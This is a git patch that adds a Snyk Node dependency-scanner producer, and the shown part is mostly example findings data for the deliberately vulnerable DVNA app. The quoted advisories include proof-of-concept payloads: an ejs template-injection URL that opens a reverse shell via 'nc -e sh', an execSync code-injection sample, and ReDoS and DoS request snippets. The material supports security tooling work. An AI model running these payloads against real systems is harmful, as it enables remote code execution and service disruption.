From 479089b5323d9037f4c8ca1463900d1258e91d33 Mon Sep 17 00:00:00 2001 From: sg Date: Thu, 10 Oct 2024 22:49:20 +0100 Subject: [PATCH] close feature #407 create a snyk node producer --- .../snyk-node/exampleData/snyk.node.pb | 103 + .../producers/snyk-node/exampleData/snyk.out | 3099 +++++++++++++++++ components/producers/snyk-node/task.yaml | 72 + .../snyk-node-project/kustomization.yaml | 12 + .../snyk-node-project/pipelinerun.yaml | 22 + 5 files changed, 3308 insertions(+) create mode 100644 components/producers/snyk-node/exampleData/snyk.node.pb create mode 100644 components/producers/snyk-node/exampleData/snyk.out create mode 100644 components/producers/snyk-node/task.yaml create mode 100644 examples/pipelines/snyk-node-project/kustomization.yaml create mode 100644 examples/pipelines/snyk-node-project/pipelinerun.yaml diff --git a/components/producers/snyk-node/exampleData/snyk.node.pb b/components/producers/snyk-node/exampleData/snyk.node.pb new file mode 100644 index 000000000..5a055ec35 --- /dev/null +++ b/components/producers/snyk-node/exampleData/snyk.node.pb @@ -0,0 +1,103 @@ + + ¥‹¡¸âÙæ„snyk…- +package.json:1-1SNYK-JS-ANSIREGEX-1583908XThis file introduces a vulnerable ansi-regex package with a high severity vulnerability. :ð+MatchedRule: {"id":"SNYK-JS-ANSIREGEX-1583908","shortDescription":{"text":"High severity - Regular Expression Denial of Service (ReDoS) vulnerability in ansi-regex"},"fullDescription":{"text":"(CVE-2021-3807) ansi-regex@2.1.1"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: ansi-regex\n* Introduced through: dvna@0.0.1, bcrypt@1.0.3 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › npmlog@4.1.2 › gauge@2.7.4 › string-width@1.0.2 › strip-ansi@3.0.1 › ansi-regex@2.1.1\n# Overview\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) due to the sub-patterns` [[\\\\]()#;?]*` and `(?:;[-a-zA-Z\\\\d\\\\/#\u0026.:=?%@~_]*)*`.\r\n\r\n\r\n## PoC\r\n```js\r\nimport ansiRegex from 'ansi-regex';\r\n\r\nfor(var i = 1; i \u003c= 50000; i++) {\r\n var time = Date.now();\r\n var attack_str = \"\\u001B[\"+\";\".repeat(i*10000);\r\n ansiRegex().test(attack_str)\r\n var time_cost = Date.now() - time;\r\n console.log(\"attack_str.length: \" + attack_str.length + \": \" + time_cost+\" ms\")\r\n}\r\n```\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.\n\nThe Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.\n\nLet’s take the following regular expression as an example:\n```js\nregex = /A(B|C+)+D/\n```\n\nThis regular expression accomplishes the following:\n- `A` The string must start with the letter 'A'\n- `(B|C+)+` The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the `+` matches one or more times). The `+` at the end of this section states that we can look for one or more matches of this section.\n- `D` Finally, we ensure this section of the string ends with a 'D'\n\nThe expression would match inputs such as `ABBD`, `ABCCCCD`, `ABCBCCCD` and `ACCCCCD`\n\nIt most cases, it doesn't take very long for a regex engine to find a match:\n\n```bash\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD\")'\n0.04s user 0.01s system 95% cpu 0.052 total\n\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX\")'\n1.79s user 0.02s system 99% cpu 1.812 total\n```\n\nThe entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.\n\nMost Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.\n\nLet's look at how our expression runs into this problem, using a shorter string: \"ACCCX\". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:\n1. CCC\n2. CC+C\n3. C+CC\n4. C+C+C.\n\nThe engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use [RegEx 101 debugger](https://regex101.com/debugger) to see the engine has to take a total of 38 steps before it can determine the string doesn't match.\n\nFrom there, the number of steps the engine must use to validate a string just continues to grow.\n\n| String | Number of C's | Number of steps |\n| -------|-------------:| -----:|\n| ACCCX | 3 | 38\n| ACCCCX | 4 | 71\n| ACCCCCX | 5 | 136\n| ACCCCCCCCCCCCCCX | 14 | 65,553\n\n\nBy the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.\n\n# Remediation\nUpgrade `ansi-regex` to version 3.0.1, 4.1.1, 5.0.1, 6.0.1 or higher.\n# References\n- [GitHub Commit](https://github.com/chalk/ansi-regex/commit/419250fa510bf31b4cc672e76537a64f9332e1f1)\n- [GitHub Commit](https://github.com/chalk/ansi-regex/commit/75a657da7af875b2e2724fd6331bf0a4b23d3c9a)\n- [GitHub Commit](https://github.com/chalk/ansi-regex/commit/8d1d7cdb586269882c4bdc1b7325d0c58c8f76f9)\n- [GitHub PR](https://github.com/chalk/ansi-regex/pull/37)\n"},"properties":{"cvssv3_baseScore":7.5,"security-severity":"7.5","tags":["security","CWE-400","npm"]}} + Message: This file introduces a vulnerable ansi-regex package with a high severity vulnerability.Bunknownù +package.json:1-1SNYK-JS-BCRYPT-572911TThis file introduces a vulnerable bcrypt package with a high severity vulnerability. :ìMatchedRule: {"id":"SNYK-JS-BCRYPT-572911","shortDescription":{"text":"High severity - Insecure Encryption vulnerability in bcrypt"},"fullDescription":{"text":"(CVE-2020-7689) bcrypt@1.0.3"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: bcrypt\n* Introduced through: dvna@0.0.1 and bcrypt@1.0.3\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3\n# Overview\n[bcrypt](https://www.npmjs.com/package/bcrypt) is an A library to help you hash passwords.\n\nAffected versions of this package are vulnerable to Insecure Encryption. Data is truncated wrong when its length is greater than 255 bytes.\n# Remediation\nUpgrade `bcrypt` to version 5.0.0 or higher.\n# References\n- [GitHub Issue](https://github.com/kelektiv/node.bcrypt.js/issues/776)\n- [GitHub PR 1](https://github.com/kelektiv/node.bcrypt.js/pull/806)\n- [GitHub PR 2](https://github.com/kelektiv/node.bcrypt.js/pull/807)\n"},"properties":{"cvssv3_baseScore":7.5,"security-severity":"7.5","tags":["security","CWE-326","npm"]}} + Message: This file introduces a vulnerable bcrypt package with a high severity vulnerability.Bunknownõ +package.json:1-1SNYK-JS-BCRYPT-575033VThis file introduces a vulnerable bcrypt package with a medium severity vulnerability. :æMatchedRule: {"id":"SNYK-JS-BCRYPT-575033","shortDescription":{"text":"Medium severity - Cryptographic Issues vulnerability in bcrypt"},"fullDescription":{"text":"bcrypt@1.0.3"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: bcrypt\n* Introduced through: dvna@0.0.1 and bcrypt@1.0.3\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3\n# Overview\n[bcrypt](https://www.npmjs.com/package/bcrypt) is an A library to help you hash passwords.\n\nAffected versions of this package are vulnerable to Cryptographic Issues. When hashing a password containing an ASCII NUL character, that character acts as the string terminator. Any following characters are ignored.\n# Remediation\nUpgrade `bcrypt` to version 5.0.0 or higher.\n# References\n- [GitHub Issue](https://github.com/kelektiv/node.bcrypt.js/issues/774)\n- [GitHub PR](https://github.com/kelektiv/node.bcrypt.js/pull/807)\n"},"properties":{"cvssv3_baseScore":5.9,"security-severity":"5.9","tags":["security","CWE-310","npm"]}} + Message: This file introduces a vulnerable bcrypt package with a medium severity vulnerability.Bunknown‡* +package.json:1-1SNYK-JS-COOKIE-8163060VThis file introduces a vulnerable cookie package with a medium severity vulnerability. :÷(MatchedRule: {"id":"SNYK-JS-COOKIE-8163060","shortDescription":{"text":"Medium severity - Cross-site Scripting (XSS) vulnerability in cookie"},"fullDescription":{"text":"(CVE-2024-47764) cookie@0.4.0"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: cookie\n* Introduced through: dvna@0.0.1, csurf@1.11.0 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › csurf@1.11.0 › cookie@0.4.0\n# Overview\n\nAffected versions of this package are vulnerable to Cross-site Scripting (XSS) via the cookie `name`, `path`, or `domain`, which can be used to set unexpected values to other cookie fields.\n\n# Workaround\nUsers who are not able to upgrade to the fixed version should avoid passing untrusted or arbitrary values for the cookie fields and ensure they are set by the application instead of user input.\n# Details\n\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\n\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\n\nInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\n\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `\u003c` can be coded as `\u0026lt`; and `\u003e` can be coded as `\u0026gt`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `\u003c` and `\u003e` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\n \nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \n\n## Types of attacks\nThere are a few methods by which XSS can be manipulated:\n\n|Type|Origin|Description|\n|--|--|--|\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\n\n## Affected environments\nThe following environments are susceptible to an XSS attack:\n\n* Web servers\n* Application servers\n* Web application environments\n\n## How to prevent\nThis section describes the top best practices designed to specifically protect your code: \n\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \n* Convert special characters such as `?`, `\u0026`, `/`, `\u003c`, `\u003e` and spaces to their respective HTML or URL encoded equivalents. \n* Give users the option to disable client-side scripts.\n* Redirect invalid requests.\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n# Remediation\nUpgrade `cookie` to version 0.7.0 or higher.\n# References\n- [GitHub Commit](https://github.com/jshttp/cookie/commit/e10042845354fea83bd8f34af72475eed1dadf5c)\n- [GitHub PR](https://github.com/jshttp/cookie/pull/167)\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2316549)\n"},"properties":{"cvssv3_baseScore":6.3,"security-severity":"6.3","tags":["security","CWE-79","npm"]}} + Message: This file introduces a vulnerable cookie package with a medium severity vulnerability.Bunknown¸ +package.json:1-1SNYK-JS-DICER-2311764SThis file introduces a vulnerable dicer package with a high severity vulnerability. :¬ MatchedRule: {"id":"SNYK-JS-DICER-2311764","shortDescription":{"text":"High severity - Denial of Service (DoS) vulnerability in dicer"},"fullDescription":{"text":"(CVE-2022-24434) dicer@0.2.5"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: dicer\n* Introduced through: dvna@0.0.1, express-fileupload@0.4.0 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › express-fileupload@0.4.0 › busboy@0.2.14 › dicer@0.2.5\n# Overview\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). A malicious attacker can send a modified form to server, and crash the nodejs service. An attacker could sent the payload again and again so that the service continuously crashes.\n# PoC\nawait fetch('http://127.0.0.1:8000', {\r\n method: 'POST',\r\n headers: {\r\n ['content-type']: 'multipart/form-data; boundary=----WebKitFormBoundaryoo6vortfDzBsDiro',\r\n ['content-length']: '145',\r\n connection: 'keep-alive',\r\n },\r\n body: '------WebKitFormBoundaryoo6vortfDzBsDiro\\r\\n Content-Disposition: form-data; name=\"bildbeschreibung\"\\r\\n\\r\\n\\r\\n------WebKitFormBoundaryoo6vortfDzBsDiro--'\r\n });\n# Remediation\nThere is no fixed version for `dicer`.\n\n# References\n- [GitHub Commit](https://github.com/mscdex/dicer/pull/22/commits/b7fca2e93e8e9d4439d8acc5c02f5e54a0112dac)\n- [GitHub Issue](https://github.com/mscdex/busboy/issues/250)\n- [GitHub PR](https://github.com/mscdex/dicer/pull/22)\n"},"properties":{"cvssv3_baseScore":7.5,"security-severity":"7.5","tags":["security","CWE-400","npm"]}} + Message: This file introduces a vulnerable dicer package with a high severity vulnerability.BunknownÍ +package.json:1-1SNYK-JS-EJS-1049328SThis file introduces a vulnerable ejs package with a medium severity vulnerability. :à MatchedRule: {"id":"SNYK-JS-EJS-1049328","shortDescription":{"text":"Medium severity - Arbitrary Code Injection vulnerability in ejs"},"fullDescription":{"text":"ejs@2.7.4"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: ejs\n* Introduced through: dvna@0.0.1 and ejs@2.7.4\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › ejs@2.7.4\n# Overview\n[ejs](https://www.npmjs.com/package/ejs) is a popular JavaScript templating engine.\n\nAffected versions of this package are vulnerable to Arbitrary Code Injection via the `render` and `renderFile`. If external input is flowing into the `options` parameter, an attacker is able run arbitrary code. This include the `filename`, `compileDebug`, and `client` option.\r\n\r\n# POC\r\n```\r\nlet ejs = require('ejs')\r\nejs.render('./views/test.ejs',{\r\n filename:'/etc/passwd\\nfinally { this.global.process.mainModule.require(\\'child_process\\').execSync(\\'touch EJS_HACKED\\') }',\r\n compileDebug: true,\r\n message: 'test',\r\n client: true\r\n})\r\n```\n# Remediation\nUpgrade `ejs` to version 3.1.6 or higher.\n# References\n- [GitHub Commit](https://github.com/mde/ejs/commit/abaee2be937236b1b8da9a1f55096c17dda905fd)\n- [GitHub Issue](https://github.com/mde/ejs/issues/571)\n"},"properties":{"cvssv3_baseScore":4.1,"security-severity":"4.1","tags":["security","CWE-94","npm"]}} + Message: This file introduces a vulnerable ejs package with a medium severity vulnerability.Bunknownä +package.json:1-1SNYK-JS-EJS-2803307QThis file introduces a vulnerable ejs package with a high severity vulnerability. :Ü MatchedRule: {"id":"SNYK-JS-EJS-2803307","shortDescription":{"text":"High severity - Remote Code Execution (RCE) vulnerability in ejs"},"fullDescription":{"text":"(CVE-2022-29078) ejs@2.7.4"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: ejs\n* Introduced through: dvna@0.0.1 and ejs@2.7.4\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › ejs@2.7.4\n# Overview\n[ejs](https://www.npmjs.com/package/ejs) is a popular JavaScript templating engine.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) by passing an unrestricted render option via the `view options` parameter of `renderFile`, which makes it possible to inject code into `outputFunctionName`.\r\n\r\n\r\n**Note:**\r\nThis vulnerability is exploitable only if the server is already vulnerable to Prototype Pollution.\r\n\r\n# PoC:\r\nCreation of reverse shell:\r\n```\r\nhttp://localhost:3000/page?id=2\u0026settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('nc -e sh 127.0.0.1 1337');s\r\n```\n# Remediation\nUpgrade `ejs` to version 3.1.7 or higher.\n# References\n- [GitHub Commit](https://github.com/mde/ejs/commit/15ee698583c98dadc456639d6245580d17a24baf)\n- [GitHub Issue](https://github.com/mde/ejs/issues/451)\n- [GitHub Release](https://github.com/mde/ejs/releases)\n- [Security Advisory](https://eslam.io/posts/ejs-server-side-template-injection-rce/)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-29078.yaml)\n"},"properties":{"cvssv3_baseScore":8.1,"security-severity":"8.1","tags":["security","CWE-94","npm"]}} + Message: This file introduces a vulnerable ejs package with a high severity vulnerability.BunknownÖ +package.json:1-1SNYK-JS-EJS-6689533SThis file introduces a vulnerable ejs package with a medium severity vulnerability. :Ì +MatchedRule: {"id":"SNYK-JS-EJS-6689533","shortDescription":{"text":"Medium severity - Improper Control of Dynamically-Managed Code Resources vulnerability in ejs"},"fullDescription":{"text":"(CVE-2024-33883) ejs@2.7.4"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: ejs\n* Introduced through: dvna@0.0.1 and ejs@2.7.4\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › ejs@2.7.4\n# Overview\n[ejs](https://www.npmjs.com/package/ejs) is a popular JavaScript templating engine.\n\nAffected versions of this package are vulnerable to Improper Control of Dynamically-Managed Code Resources due to the lack of certain pollution protection mechanisms. An attacker can exploit this vulnerability to manipulate object properties that should not be accessible or modifiable.\r\n\r\n**Note:**\r\n\r\nEven after updating to the fix version that adds enhanced protection against prototype pollution, it is still possible to override the `hasOwnProperty` method.\n# Remediation\nUpgrade `ejs` to version 3.1.10 or higher.\n# References\n- [GitHub Commit](https://github.com/mde/ejs/commit/e469741dca7df2eb400199e1cdb74621e3f89aa5)\n"},"properties":{"cvssv3_baseScore":5.3,"security-severity":"5.3","tags":["security","CWE-915","npm"]}} + Message: This file introduces a vulnerable ejs package with a medium severity vulnerability.BunknownØ +package.json:1-1!SNYK-JS-EXPRESSFILEUPLOAD-2635697bThis file introduces a vulnerable express-fileupload package with a medium severity vulnerability. :± MatchedRule: {"id":"SNYK-JS-EXPRESSFILEUPLOAD-2635697","shortDescription":{"text":"Medium severity - Arbitrary File Upload vulnerability in express-fileupload"},"fullDescription":{"text":"(CVE-2022-27140) express-fileupload@0.4.0"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: express-fileupload\n* Introduced through: dvna@0.0.1 and express-fileupload@0.4.0\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › express-fileupload@0.4.0\n# Overview\n[express-fileupload](https://github.com/richardgirges/express-fileupload) is a file upload middleware for express that wraps around busboy.\n\nAffected versions of this package are vulnerable to Arbitrary File Upload that allows attackers to execute arbitrary code when uploading a crafted PHP file.\r\n\r\n**NOTE:** The maintainers of this package dispute its validity on the grounds that the attack vector described is the normal usage of the package.\n# Remediation\nThere is no fixed version for `express-fileupload`.\n\n# References\n- [GitHub Issue](https://github.com/richardgirges/express-fileupload/issues/312)\n- [GitHub Issue](https://github.com/richardgirges/express-fileupload/issues/316)\n- [PoC](https://www.youtube.com/watch?v=4XpofFi84KI)\n"},"properties":{"cvssv3_baseScore":5.3,"security-severity":"5.3","tags":["security","CWE-434","npm"]}} + Message: This file introduces a vulnerable express-fileupload package with a medium severity vulnerability.Bunknown÷ +package.json:1-1!SNYK-JS-EXPRESSFILEUPLOAD-2635946bThis file introduces a vulnerable express-fileupload package with a medium severity vulnerability. :Ð +MatchedRule: {"id":"SNYK-JS-EXPRESSFILEUPLOAD-2635946","shortDescription":{"text":"Medium severity - Arbitrary File Upload vulnerability in express-fileupload"},"fullDescription":{"text":"(CVE-2022-27261) express-fileupload@0.4.0"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: express-fileupload\n* Introduced through: dvna@0.0.1 and express-fileupload@0.4.0\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › express-fileupload@0.4.0\n# Overview\n[express-fileupload](https://github.com/richardgirges/express-fileupload) is a file upload middleware for express that wraps around busboy.\n\nAffected versions of this package are vulnerable to Arbitrary File Upload when it is possible for attackers to upload multiple files with the same name, causing an overwrite of files in the web application server.\n# Remediation\nThere is no fixed version for `express-fileupload`.\n\n# References\n- [GitHub Issue](https://github.com/richardgirges/express-fileupload/issues/312)\n- [GitHub Issue](https://github.com/richardgirges/express-fileupload/issues/316)\n- [PoC](https://www.youtube.com/watch?v=3ROHB3ck4tA)\n"},"properties":{"cvssv3_baseScore":5.3,"security-severity":"5.3","tags":["security","CWE-434","npm"]}} + Message: This file introduces a vulnerable express-fileupload package with a medium severity vulnerability.BunknownÊ +package.json:1-1 SNYK-JS-EXPRESSFILEUPLOAD-473997`This file introduces a vulnerable express-fileupload package with a high severity vulnerability. :¦MatchedRule: {"id":"SNYK-JS-EXPRESSFILEUPLOAD-473997","shortDescription":{"text":"High severity - Denial of Service (DoS) vulnerability in express-fileupload"},"fullDescription":{"text":"express-fileupload@0.4.0"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: express-fileupload\n* Introduced through: dvna@0.0.1 and express-fileupload@0.4.0\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › express-fileupload@0.4.0\n# Overview\n[express-fileupload](https://github.com/richardgirges/express-fileupload) is a file upload middleware for express that wraps around busboy.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). The package does not limit file name length.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `express-fileupload` to version 1.1.6-alpha.6 or higher.\n# References\n- [GitHub PR](https://github.com/richardgirges/express-fileupload/pull/171)\n"},"properties":{"cvssv3_baseScore":7.5,"security-severity":"7.5","tags":["security","CWE-400","npm"]}} + Message: This file introduces a vulnerable express-fileupload package with a high severity vulnerability.BunknownÙ2 +package.json:1-1 SNYK-JS-EXPRESSFILEUPLOAD-595969`This file introduces a vulnerable express-fileupload package with a high severity vulnerability. :µ1MatchedRule: {"id":"SNYK-JS-EXPRESSFILEUPLOAD-595969","shortDescription":{"text":"High severity - Prototype Pollution vulnerability in express-fileupload"},"fullDescription":{"text":"(CVE-2020-7699) express-fileupload@0.4.0"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: express-fileupload\n* Introduced through: dvna@0.0.1 and express-fileupload@0.4.0\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › express-fileupload@0.4.0\n# Overview\n[express-fileupload](https://github.com/richardgirges/express-fileupload) is a file upload middleware for express that wraps around busboy.\n\nAffected versions of this package are vulnerable to Prototype Pollution. If the `parseNested` option is enabled, sending a corrupt HTTP request can lead to denial of service or arbitrary code execution.\n\n# Details\n\nPrototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as `__proto__`, `constructor` and `prototype`. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the `Object.prototype` are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.\n\nThere are two main ways in which the pollution of prototypes occurs:\n\n- Unsafe `Object` recursive merge\n \n- Property definition by path\n \n\n## Unsafe Object recursive merge\n\nThe logic of a vulnerable recursive merge function follows the following high-level model:\n```\nmerge (target, source)\n\n foreach property of source\n\n if property exists and is an object on both the target and the source\n\n merge(target[property], source[property])\n\n else\n\n target[property] = source[property]\n```\n\u003cbr\u003e \n\nWhen the source object contains a property named `__proto__` defined with `Object.defineProperty()` , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of `Object` and the source of `Object` as defined by the attacker. Properties are then copied on the `Object` prototype.\n\nClone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: `merge({},source)`.\n\n`lodash` and `Hoek` are examples of libraries susceptible to recursive merge attacks.\n\n## Property definition by path\n\nThere are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: `theFunction(object, path, value)`\n\nIf the attacker can control the value of “pathâ€, they can set this value to `__proto__.myValue`. `myValue` is then assigned to the prototype of the class of the object.\n\n# Types of attacks\n\nThere are a few methods by which Prototype Pollution can be manipulated:\n\n| Type |Origin |Short description |\n|--|--|--|\n| **Denial of service (DoS)**|Client |This is the most likely attack. \u003cbr\u003eDoS occurs when `Object` holds generic functions that are implicitly called for various operations (for example, `toString` and `valueOf`). \u003cbr\u003e The attacker pollutes `Object.prototype.someattr` and alters its state to an unexpected value such as `Int` or `Object`. In this case, the code fails and is likely to cause a denial of service. \u003cbr\u003e**For example:** if an attacker pollutes `Object.prototype.toString` by defining it as an integer, if the codebase at any point was reliant on `someobject.toString()` it would fail. |\n |**Remote Code Execution**|Client|Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.\u003cbr\u003e**For example:** `eval(someobject.someattr)`. In this case, if the attacker pollutes `Object.prototype.someattr` they are likely to be able to leverage this in order to execute code.|\n|**Property Injection**|Client|The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.\u003cbr\u003e **For example:** if a codebase checks privileges for `someuser.isAdmin`, then when the attacker pollutes `Object.prototype.isAdmin` and sets it to equal `true`, they can then achieve admin privileges.|\n\n# Affected environments\n\nThe following environments are susceptible to a Prototype Pollution attack:\n\n- Application server\n \n- Web server\n\n- Web browser\n \n\n# How to prevent\n\n1. Freeze the prototype— use `Object.freeze (Object.prototype)`.\n \n2. Require schema validation of JSON input.\n \n3. Avoid using unsafe recursive merge functions.\n \n4. Consider using objects without prototypes (for example, `Object.create(null)`), breaking the prototype chain and preventing pollution.\n \n5. As a best practice use `Map` instead of `Object`.\n\n## For more information on this vulnerability type:\n\n[Arteau, Oliver. “JavaScript prototype pollution attack in NodeJS application.†GitHub, 26 May 2018](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf)\n\n# Remediation\nUpgrade `express-fileupload` to version 1.1.10 or higher.\n# References\n- [GitHub Issue](https://github.com/richardgirges/express-fileupload/issues/236)\n- [GitHub PR](https://github.com/richardgirges/express-fileupload/commit/9fca550f08a9dc07cc3500921f4fa7879cf88b8f)\n- [POSIX Vulnerability Blog](https://blog.p6.is/Real-World-JS-1/)\n"},"properties":{"cvssv3_baseScore":7.5,"security-severity":"7.5","tags":["security","CWE-1321","npm"]}} + Message: This file introduces a vulnerable express-fileupload package with a high severity vulnerability.BunknownŽ +package.json:1-1SNYK-JS-INFLIGHT-6095116XThis file introduces a vulnerable inflight package with a medium severity vulnerability. :úMatchedRule: {"id":"SNYK-JS-INFLIGHT-6095116","shortDescription":{"text":"Medium severity - Missing Release of Resource after Effective Lifetime vulnerability in inflight"},"fullDescription":{"text":"inflight@1.0.6"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: inflight\n* Introduced through: dvna@0.0.1, bcrypt@1.0.3 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › rimraf@2.7.1 › glob@7.2.3 › inflight@1.0.6\n* _Introduced through_: dvna@0.0.1 › libxmljs@0.19.10 › @mapbox/node-pre-gyp@1.0.11 › rimraf@3.0.2 › glob@7.2.3 › inflight@1.0.6\n# Overview\n\nAffected versions of this package are vulnerable to Missing Release of Resource after Effective Lifetime via the `makeres` function due to improperly deleting keys from the `reqs` object after execution of callbacks. This behavior causes the keys to remain in the `reqs` object, which leads to resource exhaustion.\r\n\r\nExploiting this vulnerability results in crashing the `node` process or in the application crash.\r\n\r\n**Note:**\r\nThis library is not maintained, and currently, there is no fix for this issue. To overcome this vulnerability, several dependent packages have eliminated the use of this library.\r\n\r\nTo trigger the memory leak, an attacker would need to have the ability to execute or influence the asynchronous operations that use the inflight module within the application. This typically requires access to the internal workings of the server or application, which is not commonly exposed to remote users. Therefore, “Attack vector†is marked as “Localâ€.\n# PoC\n```js\r\nconst inflight = require('inflight');\r\n\r\nfunction testInflight() {\r\n let i = 0;\r\n function scheduleNext() {\r\n let key = `key-${i++}`;\r\n const callback = () =\u003e {\r\n };\r\n for (let j = 0; j \u003c 1000000; j++) {\r\n inflight(key, 